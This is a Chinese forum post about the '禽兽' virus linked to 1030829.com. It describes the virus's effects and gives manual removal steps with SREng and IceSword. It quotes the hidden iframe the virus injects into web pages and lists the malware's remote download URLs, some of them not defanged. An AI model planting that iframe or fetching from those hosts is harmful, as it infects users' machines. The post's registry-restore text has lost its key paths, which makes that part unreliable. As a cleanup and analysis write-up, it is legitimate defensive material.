连接到1030829网页的“禽兽”病毒
<font color="#8b0000" size="5"><font color="#0000ff"><strong>一、1030829.com的“禽兽”病毒破坏性</strong>非常严重,主要特征包括:<br/></font><font color="#000000"> 1.破坏安全模式 禁用系统的一些自我保护功能(自动更新,防火墙等)<br/> 2.IFEO映像劫持杀毒软件以及常用安全工具<br/> 3.禁用任务管理器(打不开)<br/> 4.修改主页(IE首页被锁定)<br/> 5.关闭带有“杀毒”等字样的窗口<br/> 6.感染html等网页文件<br/> 7.删除gho文件,使用户无法还原系统<br/> 8.U盘传播<br/> 9.疯狂下载多种木马和流氓软件(多达20多种木马)<br/><br/><br/></font><font color="#0000ff">二、关于中病毒“1030829”的几方面重点说明</font><br/><br/><font color="#000000"><strong>1030829的中毒者</strong>在禽兽病毒和其他一些木马作用下,系统将完全处于无保护的状态.在没有任何工具的情况下 救活系统的可能性几乎为0!!<br/><br/><strong>1030829病毒</strong>不光劫持常见杀毒软件和小工具,还劫持了msconfig.exe regedit.exe等系统常用的辅助工具。在每个分区下面生成</font><strong><font color="#ff0000">autorun.inf 和niu.exe,网页中被加插“<IfrAmE src=http://www.1030829.com/0.htm width=0 height=0></IfrAmE>”代码</font><br/><br/><br/><font color="#0000ff">注意连接到包含“1030829.com ”网页的几个链接地址</font></strong><font color="#000000">:<br/>1. 连接hxxp://www.1030829.com/pu/tj.asp做感染统计<br/>2. 下载hxxp://*.1030829.com/guanjian.txt到%system32%\text1.txt<br/>3. 连结下载hxxp://*.1030829.com/suoding.txt到%system32%\d.txt, ,把IE首页修改成d.txt中的地址<br/>4. 连接到http://*.1030829.com/down.txt(进行下载)存放于%system32%文件夹下,读取里面的地址下载木马<br/>5. 下载http://*.1030829.com/tempA.exe~http://w.1030829.com/tempW.exe到%system32%文件夹下<br/><br/></font><font color="#0000ff"><font color="#0000ff"><strong>1030829“禽兽”留言</strong></font>:禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽</font><br/><font color="#000000">又是恶毒的1030829.com在做祟。之所以叫它“禽兽”病毒,是因为它此次在破坏显示隐藏文件时,将选项名称改为“禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽”。中毒电脑会被连接到1080829.com 下的一些特点网页,除下载大量木马外,还进行中毒数据的反馈统计。<br/><br/><br/></font><font color="#0000ff">三、</font><font color="#0000ff">要<strong>清除与解决这个禽兽的1030829还真是不容易,专杀步骤与所需工具的使用</strong>如下<br/></font><br/><br/><br/><strong><font size="5"><font color="#ff8c00">1030829禽兽病毒专杀-解决与删除1030829“禽兽”病毒</font></font><br/><br/><br/><br/></strong><font color="#000000">一、清除病毒主程序<br/>在</font><a href="http://www.reizz.net/bbs2" target="_blank"><font color="#0000ff">www.reizz.net/bbs2</font></a><font color="#000000">“病毒专杀”区下载sreng2.zip和IceSword120_cn.zip(冰刃)<br/><br/>1.解压IceSword122cn.zip,把Icesword.exe改个名字为1.com<br/>运行 切换到进程窗口 结束%system32%\</font><font color="#000000"><strong>crsss.exe进程</strong> (</font><font color="#ff0000">注意是crsss.exe不是csrss.exe,一定不要搞错</font><font color="#000000">)<br/><img title="点击图片可在新窗口打开" src="http://www.45it.com/Article/UploadFiles/200709/20070929111040396.jpg" border="0" style="WIDTH: 500px; CURSOR: pointer;" alt=""/><br/><br/><br/>2.点击左下角文件按钮 删除如下文件<br/></font><font color="#ff0000">%system32%\<strong>crsss.exe<br/></strong>和每个分区下的<strong>niu.exe</strong>和autorun.inf(一定不要落下这一步)</font><br/><font color="#ff0000"><br/></font><img title="点击图片可在新窗口打开" src="http://www.45it.com/Article/UploadFiles/200709/20070929111040410.jpg" border="0" style="WIDTH: 500px; CURSOR: pointer;" alt=""/><br/><br/><br/><font color="#000000">二、修复被病毒破坏的系统<br/>1.打开sreng<br/>启动项目 注册表<br/>删除所有红色的IFEO映像劫持项目<br/>并删除<br/>下的<br/> <crsss><C:\WINDOWS\system32\crsss.exe> <br/><br/>2.还是sreng中 <br/>系统修复-Windows Shell/IE<br/>勾选如下项目<br/>允许在Windows 2000/XP/Server 2003中使用任务管理器<br/>设置主页为"about:blank"<br/>允许Internet Explorer选项窗口和选项窗口的所有内容<br/>然后点击修复<br/><br/>3.sreng中<br/>系统修复-高级修复<br/>修复安全模式<br/><br/>4.找一台未被感染病毒的与中毒电脑系统相同的电脑 导出未中毒电脑的<br/>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden整个键的内容<br/>并在中毒电脑中导入XP系统可以把下列文字拷入记事本 然后重命名为1.reg 双击导入注册表<br/>Windows Registry Editor Version 5.00<br/><br/>"Text"="@shell32.dll,-30499"<br/>"Type"="group"<br/>"Bitmap"=hex<br/>(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\<br/> <br/>00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53<br/>,00,\<br/> <br/>48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00<br/>,00,\<br/> 00<br/>"HelpID"="shell.hlp#51131"<br/><br/>"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"<br/>"Text"="@shell32.dll,-30501"<br/>"Type"="radio"<br/>"CheckedValue"=dword:00000002<br/>"ValueName"="Hidden"<br/>"DefaultValue"=dword:00000002<br/>"HKeyRoot"=dword:80000001<br/>"HelpID"="shell.hlp#51104"<br/><br/>"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"<br/>"Text"="@shell32.dll,-30500"<br/>"Type"="radio"<br/>"CheckedValue"=dword:00000001<br/>"ValueName"="Hidden"<br/>"DefaultValue"=dword:00000002<br/>"HKeyRoot"=dword:80000001<br/>"HelpID"="shell.hlp#51105"<br/><br/><br/>三、清除病毒下载的木马(由于下载的木马随时变化,所以本文中的方法仅供参考)<br/><br/>1.首先重命名如下文件<br/>C:\WINDOWS\system32\kvmxdma.dll<br/>C:\WINDOWS\system32\rsmycpm.dll<br/>C:\WINDOWS\system32\kvdxcma.dll<br/>C:\WINDOWS\system32\avwgcmn.dll<br/>C:\WINDOWS\system32\ratbdpi.dll<br/>C:\WINDOWS\system32\raqjapi.dll<br/>C:\WINDOWS\system32\rsjzbpm.dll<br/>C:\WINDOWS\system32\avzxdmn.dll<br/>C:\WINDOWS\system32\kawdbzy.dll<br/>C:\WINDOWS\system32\rarjbpi.dll<br/>C:\WINDOWS\system32\mypern0.dll<br/>(这些是前面分析过的随机7位dll木马,用重命名大法清除)<br/><br/>2.打开sreng <br/>“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:<br/>Windows dvne RunThem / dvne<br/><br/>在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:<br/>acpidisk / acpidisk<br/>系统修复 高级修复 <br/>重置winsock<br/><br/>3.重启计算机<br/>双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定,删除如下文件<br/>C:\WINDOWS\system32\drivers\svchost.exe<br/>C:\WINDOWS\system32\msavp.dll<br/>C:\WINDOWS\upxdnd.exe<br/>C:\WINDOWS\system32\drivers\acpidisk.sys<br/>c:\progra~1\yqiz文件夹<br/>以及你刚重命名的<br/>C:\WINDOWS\system32\kvmxdma.dll<br/>C:\WINDOWS\system32\rsmycpm.dll<br/>C:\WINDOWS\system32\kvdxcma.dll<br/>C:\WINDOWS\system32\avwgcmn.dll<br/>C:\WINDOWS\system32\ratbdpi.dll<br/>C:\WINDOWS\system32\raqjapi.dll<br/>C:\WINDOWS\system32\rsjzbpm.dll<br/>C:\WINDOWS\system32\avzxdmn.dll<br/>C:\WINDOWS\system32\kawdbzy.dll<br/>C:\WINDOWS\system32\rarjbpi.dll<br/>C:\WINDOWS\system32\mypern0.dll<br/><br/><br/>四、使用工具修复受感染的htm等网页文件<br/><br/>最后再次提醒大家一定要关闭电脑的自动播放功能,不要让此类恶性U盘病毒再如此肆意传播了!</font><br/></font>
页:
[1]